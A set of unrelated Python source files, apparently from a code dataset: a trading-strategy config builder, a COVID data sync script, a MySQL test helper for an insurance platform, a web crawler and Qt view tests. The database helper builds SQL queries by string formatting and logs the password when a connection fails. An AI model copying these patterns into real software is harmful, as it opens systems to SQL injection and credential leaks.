[]\n for group in uris:\n server = group.split(\":\")\n server_list.append((server[0].strip(), server[1].strip()))\n if configs.get(\"index_switch_server\"):\n seed = int(time.time())\n selected = server_list[seed % len(server_list)]\n else:\n selected = server_list[0]\n configs.pop(\"index_server_uris\")\n configs.pop(\"index_switch_server\")\n\n configs.update({\n \"index_server\": selected[0],\n \"index_port\": str(selected[1])\n })\n\n mod_config.pop('mongodb__enabled')\n mod_config.pop('exception__enabled')\n mod_config.pop('mongodb__mongouri')\n\n if self.type == \"向导式\":\n guide = self.guide\n stock_pool = guide.pop('stock', {})\n # hedge = guide.pop('hedge', {})\n mod_config.update({\n \"guide_buy_sell__kwarg\": json.dumps(guide),\n \"guide_stockpool__kwarg\": json.dumps(stock_pool)\n })\n elif self.type == \"编码式\":\n configs.update({\n \"source_code\": self.strategy_code,\n })\n mod_config.pop(\"guide_buy_sell__kwarg\")\n mod_config.pop(\"guide_stockpool__kwarg\")\n #\n mod_config.pop(\"realtime__fps\")\n\n configs.update({\"mod_config\": mod_config})\n return self.commond(configs)\n\n def simulation_commond(self):\n configs = self.simulation_args\n mod_config = configs.get(\"mod_config\", {})\n\n configs.update({\n \"start_date\": self.start_date,\n \"end_date\": self.end_date,\n \"stock_starting_cash\": self.stock_starting_cash,\n \"frequency\": self.frequency,\n \"benchmark\": self.benchmark,\n \"user_id\": self.user_id,\n \"user_account\": self.user_account,\n \"strategy_id\": self.id,\n \"strategy_name\": self.name,\n \"code_type\": self.type,\n\n \"task_id\": self.id #\n\n })\n\n mod_config.update({\n \"sys_simulation__matching_type\": self.matching_type,\n \"sys_simulation__slippage\": str(self.slippage),\n \"sys_simulation__commission_multiplier\": str(self.commission_multiplier),\n \"realtime__simulation_id\": str(self.simulation_id), #\n })\n\n uris = configs.get(\"index_server_uris\").split(\",\")\n server_list = []\n for group in uris:\n server = group.split(\":\")\n server_list.append((server[0].strip(), server[1].strip()))\n if configs.get(\"index_switch_server\"):\n seed = int(time.time())\n selected = server_list[seed % len(server_list)]\n else:\n selected = server_list[0]\n configs.pop(\"index_server_uris\")\n configs.pop(\"index_switch_server\")\n\n configs.update({\n \"index_server\": selected[0],\n \"index_port\": str(selected[1])\n })\n\n if self.type == \"向导式\":\n guide = self.guide\n stock_pool = guide.pop('stock', {})\n # hedge = guide.pop('hedge', {})\n mod_config.update({\n \"guide_buy_sell__kwarg\": json.dumps(guide),\n \"guide_stockpool__kwarg\": json.dumps(stock_pool)\n })\n elif self.type == \"编码式\":\n configs.update({\n \"source_code\": self.strategy_code,\n })\n mod_config.pop(\"guide_buy_sell__kwarg\")\n mod_config.pop(\"guide_stockpool__kwarg\")\n #\n mod_config.pop(\"realtime__fps\")\n\n configs.update({\"mod_config\": mod_config})\n return self.commond(configs)\n\n def backtest_commond(self, task_id, debug):\n configs = self.backtest_args\n mod_config = configs.get(\"mod_config\", {})\n\n configs.update({\n \"start_date\": self.start_date,\n \"end_date\": self.end_date,\n \"stock_starting_cash\": self.stock_starting_cash,\n \"frequency\": self.frequency,\n \"benchmark\": self.benchmark,\n \"user_id\": self.user_id,\n \"user_account\": self.user_account,\n \"strategy_id\": self.id,\n \"strategy_name\": self.name,\n \"code_type\": self.type,\n \"log_level\": self.log_level,\n\n \"task_id\": task_id,\n\n })\n\n mod_config.update({\n \"sys_simulation__matching_type\": self.matching_type,\n \"sys_simulation__slippage\": str(self.slippage),\n \"sys_simulation__commission_multiplier\": str(self.commission_multiplier),\n \"sys_simulation__stock_min_commision\": str(self.stock_min_commision)\n })\n\n uris = configs.get(\"index_server_uris\").split(\",\")\n print(uris)\n # sys.exit(0)\n server_list = []\n for group in uris:\n server = group.split(\":\")\n server_list.append((server[0].strip(), server[1].strip()))\n if configs.get(\"index_switch_server\"):\n seed = int(time.time())\n selected = server_list[seed % len(server_list)]\n else:\n selected = server_list[0]\n configs.pop(\"index_server_uris\")\n configs.pop(\"index_switch_server\")\n\n configs.update({\n \"index_server\": selected[0],\n \"index_port\": str(selected[1])\n })\n\n if self.type == \"向导式\":\n guide = self.guide\n stock_pool = guide.pop('stock', {})\n # hedge = guide.pop('hedge', {})\n mod_config.update({\n \"guide_buy_sell__kwarg\": json.dumps(guide),\n \"guide_stockpool__kwarg\": json.dumps(stock_pool)\n })\n elif self.type == \"编码式\":\n configs.update({\n \"source_code\": self.strategy_code,\n })\n mod_config.pop(\"guide_buy_sell__kwarg\")\n mod_config.pop(\"guide_stockpool__kwarg\")\n\n configs.update({\"mod_config\": mod_config})\n\n return self.commond(configs)\n\n def commond(self, configs):\n commond = []\n for key, value in configs.items():\n if key == \"mod_config\":\n continue\n commond.append('--' + key.replace('_', '-'))\n commond.append(value)\n\n for key, value in configs.get(\"mod_config\", {}).items():\n commond.extend(['--mod-config', key, value])\n return commond\n\n\nif __name__ == \"__main__\":\n class Strategy(BaseConfigMixin):\n def __init__(self, **kwargs):\n self.__dict__ = kwargs\n\n args = {\n \"name\": '符瑞阳的策略001',\n \"type\": \"向导式\",\n \"strategy_code\": \"abcdefg\",\n \"start_date\": \"2016-01-01\",\n \"end_date\": \"2017-09-01\",\n \"stock_starting_cash\": 100000,\n \"frequency\": \"1d\",\n \"benchmark\": '000001.XSHG',\n \"matching_type\": \"current_bar\",\n \"slippage\": 0,\n \"commission_multiplier\": 1,\n \"stock_min_commision\": 5,\n \"log_level\": \"info\",\n \"guide\": {}\n\n }\n strategy = Strategy(**args)\n\n user_uid = \"1\" # request.user.uid\n user_username = \"ruiyang\" # request.user.username\n timestamp = time.time()\n strategy.__dict__.update({\n 'modified_time': timestamp,\n 'create_time': timestamp,\n 'user_id': user_uid,\n 'user_account': user_username,\n 'task_names': []\n })\n\n import bson\n id = str(bson.ObjectId())\n\n strategy.__dict__.update({\n \"id\": id,\n })\n\n task = str(bson.ObjectId())\n\n task_name = \"{}_{}_{}\".format('b', user_uid, task)\n\n debug = True #\n\n strategy.set_backtest_args()\n try:\n strategy.backtest_commond(task, debug)\n except Exception as e:\n print(e)\n\n # j = BaseConfigMixin()\n # j.backtest_commond(None, None)\n # j.simulation_commond()\n\n # rundemo = EtcdConfigMixin()\n # rundemo.set_backtest_args()\n # print(rundemo.backtest_args)\n # rundemo.set_simulation_args()\n # print(rundemo.simulation_args)\n # rundemo.set_realtrade_args()\n # print(rundemo.realtrade_args)\n # rundemo.set_backtest_environment()\n # print(rundemo.backtest_environment)\n # rundemo.set_simulation_environment()\n # print(rundemo.simulation_environment)\n # rundemo.set_realtrade_environmet()\n # print(rundemo.realtrade_environment)\n\n","sub_path":"try_002.py","file_name":"try_002.py","file_ext":"py","file_size_in_byte":23136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"294313729","text":"import wget\nimport pymongo\nfrom dotenv import load_dotenv\n\nfrom pprint import pprint\nimport os\nimport csv\nfrom datetime import datetime\n\n\nDATA_URL = 'https://data.ontario.ca/dataset/f4112442-bdc8-45d2-be3c-12efae72fb27/resource/455fd63b-603d-4608-8216-7d8647f43350/download/conposcovidloc.csv'\n\ndef download_data(url):\n filename = 'data/raw/ontario/ontario_cases_{}.csv'.format(datetime.now())\n return wget.download(url, filename)\n\n\ndef read_csv(filename):\n cases = []\n with open(filename) as csv_file:\n reader = csv.reader(csv_file)\n column_names = next(reader)\n for row in reader:\n tmp = {\n '_id': row[0],\n 'episode_date': datetime.strptime(row[1], '%Y-%m-%d'),\n }\n\n for index, column in enumerate(row):\n field_name = column_names[index].lower()\n if 'latitude' in field_name or 'longitude' in field_name:\n tmp[field_name] = float(column)\n else:\n tmp[field_name] = column\n\n cases.append(tmp)\n\n return cases\n\n\ndef sync_with_db(cases, mongo_uri):\n client = pymongo.MongoClient(mongo_uri)\n db = client.get_default_database()\n db.ontario_cases.drop()\n db.ontario_cases.insert_many(cases)\n\n\nif __name__ == '__main__':\n load_dotenv()\n mongo_uri = os.getenv('MONGO_URI', 'mongodb://localhost.com:27071')\n\n filename = download_data(DATA_URL)\n cases = read_csv(filename)\n sync_with_db(cases, mongo_uri)\n","sub_path":"src/sync_ontario_cases.py","file_name":"sync_ontario_cases.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"451698899","text":"#!/usr/bin/env python3\n# -*- coding: utf-8; -*-\nimport mysql.connector\nimport common.logger as logger\nimport common.config_module as config_module\nfrom common.check_verify import is_equal\n\n\nclass CheDb(object):\n def __init__(self, db_config=None, verbose=False):\n db_config = db_config or config_module.load()[\"database\"]\n self.host = db_config[\"host\"]\n self.port = db_config[\"port\"]\n self.database = db_config[\"database\"]\n self.username = db_config[\"username\"]\n self.password = db_config[\"password\"]\n self.connection = self.open_validate_mysql_connection(verbose=verbose)\n\n def open_validate_mysql_connection(self, verbose=False):\n try:\n conn = mysql.connector.connect(host=self.host, port=self.port, database=self.database, user=self.username, password=self.password)\n conn.autocommit = True\n if verbose:\n logger.success(\"DB connected successfully\")\n return conn\n except mysql.connector.Error as e:\n logger.fail(\"DB connection failure %s\" % e)\n tabspace = \"\\n\" + \" \" * 19\n logger.info(\"Connection parameters:{t}host = '{h}';{t}port = '{p}';{t}database = '{d}';{t}user = '{u}';{t}password = '{w}'\".format(\n t=tabspace, h=self.host, p=self.port, d=self.database, u=self.username, w=self.password))\n raise e\n\n def __del__(self):\n self.connection.close()\n\n def __enter__(self):\n return self\n\n def __exit__(self, ttype, value, traceback):\n self.__del__()\n\n def destroy(self):\n self.__del__()\n\n def get_disabled_companies_for_partner_id(self, partner_id):\n cursor = self.connection.cursor()\n query = \"select distinct cast(propValue as unsigned) from partnerProperties \" \\\n \"where propName='disabled_company' and partnerId='%s';\" % partner_id\n try:\n cursor.execute(query)\n company_ids = [company_id[0] for company_id in cursor]\n if company_ids:\n return company_ids\n return False\n finally:\n cursor.close()\n\n def is_company_blocked(self, company_id):\n cursor = self.connection.cursor()\n query = \"select isBlocked from companies where id='%s';\" % company_id\n try:\n cursor.execute(query)\n blocked_state = [is_blocked[0] for is_blocked in cursor]\n return bool(blocked_state[0])\n finally:\n cursor.close()\n\n def get_company_id_by_name(self, company_name):\n cursor = self.connection.cursor()\n query = \"select `id` from companies where name='%s';\" % company_name\n try:\n cursor.execute(query)\n company_id = [company_id[0] for company_id in cursor]\n return company_id[0] if company_id else False\n finally:\n cursor.close()\n\n def get_key_for_partner_id(self, partner_id):\n cursor = self.connection.cursor()\n query = \"select `key` from apiKeys where partnerId='%s';\" % partner_id\n try:\n cursor.execute(query)\n partner_keys = [key[0] for key in cursor]\n return partner_keys[0] if partner_keys else False\n finally:\n cursor.close()\n\n def get_key_for_partner_code(self, company_code):\n cursor = self.connection.cursor()\n query = \"select `key` from apiKeys where partnerId = (select id from partners where code = '%s');\" % company_code\n try:\n cursor.execute(query)\n key = [key[0] for key in cursor]\n return key[0] if key else False\n finally:\n cursor.close()\n\n def get_insurance_companies_list(self, disabled=None):\n cursor = self.connection.cursor()\n try:\n selection = \"where isBlocked={0}\".format(disabled) if disabled == 1 or disabled == 0 else \"\"\n cursor.execute(\"select code, name from companies {0}\".format(selection))\n return {code: name for (code, name) in cursor}\n finally:\n cursor.close()\n\n def get_countries_list(self, enabled=None):\n cursor = self.connection.cursor()\n try:\n selection = \"where isInsurable={0}\".format(enabled) if enabled == 1 or enabled == 0 else \"\"\n cursor.execute(\"select code from countries {0}\".format(selection))\n return [code[0] for code in cursor]\n finally:\n cursor.close()\n\n def get_countries_names(self):\n cursor = self.connection.cursor()\n try:\n cursor.execute(\"select code, name from countries\")\n return {code: name for (code, name) in cursor}\n finally:\n cursor.close()\n\n def get_dollar_exchange_rate(self):\n cursor = self.connection.cursor()\n try:\n cursor.execute(\"select rate from currencyRate where dateRate=CURDATE() and code='USD'\")\n result = [float(decimal[0]) for decimal in cursor]\n return result[0] if result else 0.0\n finally:\n cursor.close()\n\n def get_euro_exchange_rate(self):\n cursor = self.connection.cursor()\n try:\n cursor.execute(\"select rate from currencyRate where dateRate=CURDATE() and code='EUR'\")\n result = [float(decimal[0]) for decimal in cursor]\n return result[0] if result else 0.0\n finally:\n cursor.close()\n\n def verify_policy_data_in_database_by_task_id(self, task_id, price, check_parent_task_only=False):\n operation_name = \"Check task for policy and price in database\"\n logger.start(operation_name)\n if task_id is None:\n return self.finish_skip(operation_name + \" (Task id was not received)\")\n total_summ = 0.0\n try:\n # check if parent task exists in database\n self.find_task_id(task_id)\n logger.success(\"The parent task '%s' found in database\" % task_id)\n if check_parent_task_only:\n logger.warning(\"Policy creation is in progress, no need to check any further\")\n return self.finish_success(operation_name)\n # get child task that created policy for parent task\n for child_task_id in self.get_task_id_list_to_create_policy(task_id):\n logger.success(\"The child task '%s' to create policy found in database\" % child_task_id)\n # verify that database has records about created policy\n for policy_id in self.get_policy_ids_by_task_id(child_task_id):\n logger.success(\"The policy '%s' made by task '%s' found in database\" % (policy_id, child_task_id))\n # check the calculations for task were successfully made\n for calculation_id in self.get_policy_calculation_by_task_id(child_task_id):\n logger.success(\"The calculation '%s' for created policy found in database\" % calculation_id)\n # get prices for selected calculation and calculate total summ\n for db_price in self.get_policy_price_by_calculation_id(calculation_id):\n logger.success(\"The calculated price '%.2f' found in database\" % db_price)\n total_summ += db_price\n return self.finish_success(operation_name) \\\n if self.is_price_equal_total_summ(total_summ, price) \\\n else self.finish_fail(operation_name)\n except ValueError:\n logger.warning(\"Check supervisor status on remote host and restart it if needed ('sudo service supervisor restart')\")\n return self.finish_fail(operation_name)\n\n def verify_avia_policy_data_in_database_by_task_id(self, task_id, calc_id):\n operation_name = \"Check task for avia policy and price in database\"\n logger.start(operation_name)\n if task_id is None:\n return self.finish_skip(operation_name + \" (Task id was not received)\")\n try:\n # check if parent task exists in database\n self.find_task_id(task_id)\n logger.success(\"The parent task '%s' found in database\" % task_id)\n calculation_code_in_database = \\\n self.execute_query(\"select uuid from tasks where id='%s'\" % task_id)[0][0]\n is_equal(calculation_code_in_database, calc_id, \"Calculation code for task '%s'\" % task_id)\n # get child task that created policy for parent task\n for child_task_id in self.get_task_id_list_to_create_avia_policy(task_id):\n logger.success(\"The child task '%s' to create policy found in database\" % child_task_id)\n # verify that database has records about created policy\n for policy_id in self.get_policy_ids_by_task_id(child_task_id):\n logger.success(\"The policy '%s' made by task '%s' found in database\" % (policy_id, child_task_id))\n return self.finish_success(operation_name)\n except ValueError:\n logger.warning(\"Check supervisor status on remote host and restart it if needed ('sudo service supervisor restart')\")\n return self.finish_fail(operation_name)\n\n def verify_policies_payment_system_by_task_id(self, task_id, payment_system, check_parent_task_only):\n operation_name = \"Check payment system for policies\"\n logger.start(operation_name)\n if task_id is None:\n return self.finish_skip(operation_name + \" (Task id was not received)\")\n try:\n # check if parent task exists in database\n self.find_task_id(task_id)\n logger.success(\"The parent task '%s' found in database\" % task_id)\n if check_parent_task_only:\n logger.warning(\"Policy creation is in progress, no need to check any further\")\n return self.finish_success(operation_name)\n logger.info(\"Expected payment system: '%s'\" % self.get_payment_system_name_by_code(payment_system))\n logger.info(\"Expected payment system id: '%s'\" % self.get_payment_system_id_by_code(payment_system))\n\n # get child task that created policy for parent task\n result = True\n for child_task_id in self.get_task_id_list_to_create_policy(task_id):\n logger.success(\"The child task '%s' to create policy found in database\" % child_task_id)\n # verify that database has records about created policy\n for policy_id in self.get_policy_ids_by_task_id(child_task_id):\n logger.success(\"The policy '%s' made by task '%s' found in database\" % (policy_id, child_task_id))\n result = is_equal(actual_value=self.get_policy_payment_system_id_by_policy_id(policy_id),\n expected_value=self.get_payment_system_id_by_code(payment_system),\n value_name=\"Policy transaction payment system\") \\\n and result\n return self.finish_success(operation_name) \\\n if result \\\n else self.finish_fail(operation_name)\n except ValueError:\n logger.warning(\"Check supervisor status on remote host and restart it if needed ('sudo service supervisor restart')\")\n return self.finish_fail(operation_name)\n\n def verify_policy_payment_system(self, policy_id, payment_system):\n query = \"select paymentSystemId from transactions where id=select transactionId from policiesTransactions where policyId=%s\" % policy_id\n cursor = self.connection.cursor()\n try:\n cursor.execute(query)\n paymentSystemId = [psid for psid in cursor]\n if len(paymentSystemId) != 1:\n msg = \"Payment System for policy '%s'\" % policy_id\n logger.fail(msg + \" is found in database\")\n raise ValueError(\"No \" + msg + \" is found in database\")\n if paymentSystemId[0] == payment_system:\n return True\n return False\n finally:\n cursor.close()\n\n def find_task_id(self, task_id):\n cursor = self.connection.cursor()\n try:\n cursor.execute(\"select id from tasks where id='%s'\" % task_id)\n tasks = [ids[0] for ids in cursor]\n if len(tasks) != 1:\n msg = \"Task with id '%s'\" % task_id\n logger.fail(msg + \" is found in database\")\n raise ValueError(\"No \" + msg + \" is found in database\")\n return tasks\n finally:\n cursor.close()\n\n def get_task_id_list_to_create_policy(self, task_id):\n try:\n cursor = self.connection.cursor()\n cursor.execute(\"select id from tasks where code in ('CreatePolicy', 'CreateConfirmPolicy') and taskId='%s'\" % task_id)\n tasks_to_create_policy = [ids[0] for ids in cursor]\n if not tasks_to_create_policy:\n msg = \"Task to create policy with parent task_id '%s' (code 'CreatePolicy' or 'CreateConfirmPolicy')\" % task_id\n logger.fail(msg + \" is found in database\")\n raise ValueError(\"No \" + msg + \" is found in database\")\n return tasks_to_create_policy\n finally:\n cursor.close()\n\n def get_task_id_list_to_create_avia_policy(self, task_id):\n try:\n cursor = self.connection.cursor()\n cursor.execute(\"select id from tasks where code in ('CreateSingleAviaPolicy') and taskId='%s'\" % task_id)\n tasks_to_create_policy = [ids[0] for ids in cursor]\n if len(tasks_to_create_policy) == 0:\n msg = \"Task to create policy with parent task_id '%s' (code 'CreateSingleAviaPolicy')\" % task_id\n logger.fail(msg + \" is found in database\")\n raise ValueError(\"No \" + msg + \" is found in database\")\n return tasks_to_create_policy\n finally:\n cursor.close()\n\n def get_policy_ids_by_task_id(self, task_id):\n try:\n cursor = self.connection.cursor()\n cursor.execute(\"select id from policies where taskId='%s'\" % task_id)\n policy_id_created = [ids[0] for ids in cursor]\n if len(policy_id_created) == 0:\n msg = \"Policy for task '%s'\" % task_id\n logger.fail(msg + \" is found in database\")\n raise ValueError(\"No \" + msg + \" is found in database\")\n return policy_id_created\n finally:\n cursor.close()\n\n def get_policy_calculation_by_task_id(self, task_id):\n try:\n cursor = self.connection.cursor()\n cursor.execute(\"select calculationId from policies where taskId='%s'\" % task_id)\n calculation_id_list = [ids[0] for ids in cursor]\n if len(calculation_id_list) == 0:\n msg = \"Calculations for task '%s'\" % task_id\n logger.fail(msg + \" were found in database\")\n raise ValueError(\"No \" + msg + \" were found in database\")\n return calculation_id_list\n finally:\n cursor.close()\n\n def get_policy_price_by_calculation_id(self, calculation_id):\n try:\n cursor = self.connection.cursor()\n cursor.execute(\"select price from calculations where id=%s\" % calculation_id)\n price_calculated = [float(prices[0]) for prices in cursor]\n if len(price_calculated) == 0:\n msg = \"Calculated price for calculation '%s'\" % calculation_id\n logger.fail(msg + \" is found in database\")\n raise ValueError(\"No \" + msg + \" is found in database\")\n return price_calculated\n finally:\n cursor.close()\n\n def get_countries_from_euro_zone(self):\n try:\n cursor = self.connection.cursor()\n query = \"SELECT c.code FROM countryGroups cg \" \\\n \"LEFT JOIN countriesCountryGroups ccg ON ccg.countryGroupId = cg.id \" \\\n \"LEFT JOIN countries c ON c.id = ccg.countryId \" \\\n \"WHERE cg.`code` = 'europe'\"\n cursor.execute(query)\n return [code[0] for code in cursor]\n finally:\n cursor.close()\n\n def is_price_equal_total_summ(self, total_summ, price):\n if price is None:\n return logger.warning(\"Check policy price with expected value (Price was not received): Skipped\") and False\n msg = \"The policy price in database (%.2f) is equal to expected (%.2f)\" % (total_summ, price)\n if total_summ == price:\n return logger.success(msg) or True\n elif abs(total_summ - price) <= 0.5:\n # Calculation accuracy depends on the companies rules, so final values can be rounded for database.\n # Acceptable difference between calculated and finally processed price is taken as 0.50 Rub.\n logger.success(msg)\n return logger.warning(\"The price in database is not equal to the calculated price (difference = %s)\"\n % round(abs(total_summ - price), 2)) or True\n else:\n return logger.fail(msg) and False\n\n def finish_success(self, message):\n logger.finishSuccess(message)\n logger.print_empty_line()\n return True\n\n def finish_fail(self, message):\n logger.finishFail(message)\n logger.print_empty_line()\n return False\n\n def finish_skip(self, message):\n logger.finishSkipped(message)\n logger.print_empty_line()\n return True\n\n def get_sport_name_by_code(self, code, competition=False):\n cursor = self.connection.cursor()\n try:\n cursor.execute(\"select * from sports where code='%s' and isCompetition=%s\" % (code, int(competition)))\n sport_name = [sport[1] for sport in cursor]\n return sport_name[0] if sport_name else None\n finally:\n cursor.close()\n\n def get_country_group_by_code(self, code):\n cursor = self.connection.cursor()\n try:\n cursor.execute(\"select * from countryGroups where code='%s'\" % code)\n group_name = [group[2] for group in cursor]\n return group_name[0] if group_name else None\n finally:\n cursor.close()\n\n def get_country_by_code(self, code):\n cursor = self.connection.cursor()\n try:\n cursor.execute(\"select * from countries where code='%s'\" % code)\n group_name = [group[2] for group in cursor]\n return group_name[0] if group_name else None\n finally:\n cursor.close()\n\n def is_user_in_database(self, username, verbose=False):\n if verbose:\n logger.info(\"Looking database for user with login '%s' ..\" % username)\n query = \"select id from users where login='%s';\" % username\n cursor = self.connection.cursor()\n try:\n cursor.execute(query)\n user_id_list = [user[0] for user in cursor]\n if len(user_id_list) == 0:\n if verbose:\n logger.success(\"User '%s' is not found in database\" % username)\n return False\n elif len(user_id_list) == 1:\n if verbose:\n logger.success(\"User '%s' is found in database\" % username)\n return True\n else:\n logger.error(\"Unexpected number of results (%s) for query \\\"%s\\\": only 1 should appear as result\"\n % (len(user_id_list), query))\n raise ValueError(\"Unexpected query result while checking user in database\")\n finally:\n cursor.close()\n\n def get_valid_partner_keys(self):\n cursor = self.connection.cursor()\n try:\n cursor.execute(\"select apiKeys.key from apiKeys;\")\n api_keys = [api_key[0] for api_key in cursor]\n return api_keys if api_keys else None\n finally:\n cursor.close()\n\n def execute_query(self, query):\n cursor = self.connection.cursor()\n try:\n cursor.execute(query)\n result = [x for x in cursor]\n return result if result else []\n finally:\n cursor.close()\n\n def get_payment_system_id_by_code(self, code):\n cursor = self.connection.cursor()\n try:\n cursor.execute(\"select id from paymentSystems where code='%s'\" % code)\n output = [result[0] for result in cursor]\n return output[0]\n finally:\n cursor.close()\n\n def get_payment_system_name_by_code(self, code):\n cursor = self.connection.cursor()\n try:\n cursor.execute(\"select name from paymentSystems where code='%s'\" % code)\n output = [result[0] for result in cursor]\n return output[0]\n finally:\n cursor.close()\n\n def get_policy_payment_system_id_by_policy_id(self, policy_id):\n query = \"select t.paymentSystemId from policies as p \" \\\n \"left join policiesTransactions as pt on p.id = pt.policyId \" \\\n \"left join transactions as t on t.id = pt.transactionId \" \\\n \"where p.id = '%s'\" % policy_id\n cursor = self.connection.cursor()\n try:\n cursor.execute(query)\n payment_system_id = [x[0] for x in cursor]\n return payment_system_id[0] if payment_system_id else -1\n finally:\n cursor.close()\n\n def get_blocked_companies(self):\n query = \"select id from cherehapa_funk.companies where isBlocked=1\"\n cursor = self.connection.cursor()\n try:\n cursor.execute(query)\n return [x[0] for x in cursor]\n finally:\n cursor.close()\n\n\nif __name__ == \"__main__\": # self check\n db = CheDb(config_module.load()[\"database\"])\n del db\n","sub_path":"che-test/scripts/autotests/common/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":21900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"544515532","text":"import time\n\nimport aiohttp\nimport asyncio\n\nfrom course import extract_courses\nfrom detail import extract_details, rename_keys\nfrom detail.other_partial_detail import course_page_detail\nfrom faculty import get_faculty_urls_with_name\nfrom faculty.fac_info import get_one_fac_info\nfrom test import final_run\nfrom write_to_json import write_to_json\n\nfrom category import extract_categories\n\n\nasync def start_crawl(base_url):\n session = aiohttp.ClientSession()\n category_list = await extract_categories(base_url, session)\n write_to_json(category_list, './category/outputfiles/categories.json')\n course_list = extract_courses()\n write_to_json(course_list, './course/outputfiles/courses.json')\n detail_list = await extract_details(course_list,session)\n write_to_json(detail_list, './detail/outputfiles/origin_details.json')\n partial_detail = rename_keys(detail_list)\n write_to_json(partial_detail, './detail/outputfiles/first_partial_detail.json')\n\n coroutines = []\n for detail in partial_detail:\n coroutines.append(course_page_detail(detail,session))\n final_details = await asyncio.gather(*coroutines)\n # print(final_details)\n write_to_json(final_details, './detail/outputfiles/detail_6110_CBUS_XW_0226.json')\n\n fac_urls_with_names = get_faculty_urls_with_name(final_details)\n coroutines = []\n for url_with_name in fac_urls_with_names:\n coroutines.append(get_one_fac_info(url_with_name[0],url_with_name[1],session))\n faculties = await asyncio.gather(*coroutines)\n write_to_json(faculties, 'faculty/outputfiles/faculty_6110_CBUS_XW_0316.json')\n await session.close()\n return\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n start_time = time.time()\n BASE_URL = 'https://business.stthomas.edu/executive-education/individuals/index.html'\n asyncio.run(start_crawl(BASE_URL))\n final_run()\n duration = time.time() - start_time\n minutes = duration // 60\n print(f\"Crawled {duration} seconds, {minutes} mins\")\n\n","sub_path":"4_opus_6110_single/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"593925105","text":"from pathlib import Path\n\nimport pandas as pd\nimport pytest\nfrom PySide2.QtCore import Qt\nfrom PySide2.QtWidgets import QHeaderView, QSizePolicy\nfrom esofile_reader import EsoFile\n\nfrom chartify.ui.simpleview import SimpleView\nfrom chartify.utils.utils import FilterTuple, VariableData\nfrom tests import ROOT\n\nWIDTH = 402\n\n\n@pytest.fixture(scope=\"module\")\ndef eso_file():\n return EsoFile(Path(ROOT, \"eso_files\", \"eplusout1.eso\")).generate_totals()\n\n\n@pytest.fixture\ndef hourly_df(eso_file):\n return eso_file.get_header_df(\"hourly\")\n\n\n@pytest.fixture\ndef daily_df(eso_file):\n return eso_file.get_header_df(\"daily\")\n\n\n@pytest.fixture\ndef simple_view(qtbot, hourly_df):\n simple_view = SimpleView(0)\n simple_view.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Expanding)\n simple_view.setFixedWidth(WIDTH)\n simple_view.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\n simple_view.populate_view(variables_df=hourly_df.copy(), interval=\"hourly\", is_tree=True)\n simple_view.update_view_appearance()\n simple_view.show()\n qtbot.addWidget(simple_view)\n return simple_view\n\n\ndef test_init_simple_view(simple_view: SimpleView):\n assert simple_view.rootIsDecorated()\n assert simple_view.uniformRowHeights()\n assert simple_view.isSortingEnabled()\n assert simple_view.hasMouseTracking()\n assert simple_view.dragEnabled()\n\n assert not simple_view.wordWrap()\n assert not simple_view.alternatingRowColors()\n\n assert simple_view.selectionBehavior() == SimpleView.SelectRows\n assert simple_view.selectionMode() == SimpleView.ExtendedSelection\n assert simple_view.editTriggers() == SimpleView.NoEditTriggers\n assert simple_view.defaultDropAction() == Qt.CopyAction\n assert simple_view.horizontalScrollBarPolicy() == Qt.ScrollBarAsNeeded\n assert simple_view.focusPolicy() == Qt.NoFocus\n\n assert simple_view.id_ == 0\n\n\ndef test_build_simple_view(qtbot, simple_view: SimpleView, hourly_df: pd.DataFrame):\n assert simple_view.model().rowCount() == 49\n assert simple_view.model().sourceModel().rowCount() == 49\n\n assert simple_view.interval == \"hourly\"\n assert not simple_view.is_tree\n assert not simple_view.rate_to_energy\n assert simple_view.units_system == \"SI\"\n assert simple_view.energy_units == \"J\"\n assert not simple_view.next_update_forced\n\n\ndef test_initial_view_appearance(qtbot, simple_view: SimpleView, hourly_df: pd.DataFrame):\n assert simple_view.header().sectionSize(0) == 330\n assert simple_view.header().sectionSize(1) == 70\n\n assert not simple_view.header().stretchLastSection()\n assert simple_view.header().sectionResizeMode(0) == QHeaderView.Stretch\n assert simple_view.header().sectionResizeMode(1) == QHeaderView.Fixed\n\n assert simple_view.header().sortIndicatorOrder() == Qt.AscendingOrder\n\n\ndef test_on_view_resized_stretch(qtbot, simple_view: SimpleView, hourly_df: pd.DataFrame):\n simple_view.update_view_appearance()\n with qtbot.assertNotEmitted(simple_view.viewSettingsChanged):\n simple_view.header().resizeSection(1, 125)\n\n\ndef test_on_section_moved(qtbot, simple_view: SimpleView, hourly_df: pd.DataFrame):\n def test_header(cls, dct):\n return cls == \"simpleview\" and dct[\"header\"] == (\"units\", \"variable\")\n\n with qtbot.wait_signal(simple_view.viewSettingsChanged, check_params_cb=test_header):\n simple_view.header().moveSection(0, 1)\n\n\ndef test_on_slider_moved(simple_view: SimpleView, hourly_df: pd.DataFrame):\n simple_view.verticalScrollBar().setSliderPosition(10)\n\n assert simple_view.verticalScrollBar().value() == 10\n\n\ndef test_update_scrollbar_position(simple_view: SimpleView, daily_df: pd.DataFrame):\n simple_view.verticalScrollBar().setSliderPosition(10)\n simple_view.populate_view(daily_df, \"daily\")\n simple_view.update_scrollbar_position()\n assert simple_view.verticalScrollBar().value() == 10\n\n\ndef test_on_double_clicked(qtbot, simple_view: SimpleView, hourly_df: pd.DataFrame):\n def variable_data(index):\n test_data = VariableData(\"\", \"Boiler Gas Rate\", \"W\", \"W\")\n data = simple_view.model().data_at_index(index)\n return test_data == data\n\n point = simple_view.visualRect(simple_view.model().index(1, 0)).center()\n # need to move mouse to hover over view\n qtbot.mouseMove(simple_view.viewport(), pos=point)\n signals = [simple_view.doubleClicked, simple_view.itemDoubleClicked]\n callbacks = [variable_data, None]\n with qtbot.wait_signals(signals, check_params_cbs=callbacks):\n # need to click first as single double click would emit only pressed signal\n qtbot.mouseClick(simple_view.viewport(), Qt.LeftButton, pos=point)\n qtbot.mouseDClick(simple_view.viewport(), Qt.LeftButton, pos=point)\n\n\ndef 